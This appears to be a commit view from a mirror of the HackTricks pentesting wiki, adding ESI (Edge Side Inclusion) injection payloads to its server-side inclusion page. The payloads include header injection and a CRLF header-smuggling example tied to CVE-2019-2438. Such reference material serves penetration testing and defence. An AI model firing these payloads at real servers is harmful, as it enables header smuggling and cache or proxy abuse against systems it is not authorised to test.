0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3605] No subject

This commit is contained in:
CPol 2022-10-15 14:18:24 +00:00 committed by gitbook-bot
parent 747c497387
commit 0c112f832b
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View File

@ -155,6 +155,25 @@ Do not confuse this with a "Local File Inclusion":
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### Add Header
```html
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
#### CRLF in Add header (**CVE-2019-2438)**
****
```markup
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
#### Akamai debug
This will send debug information included in the response: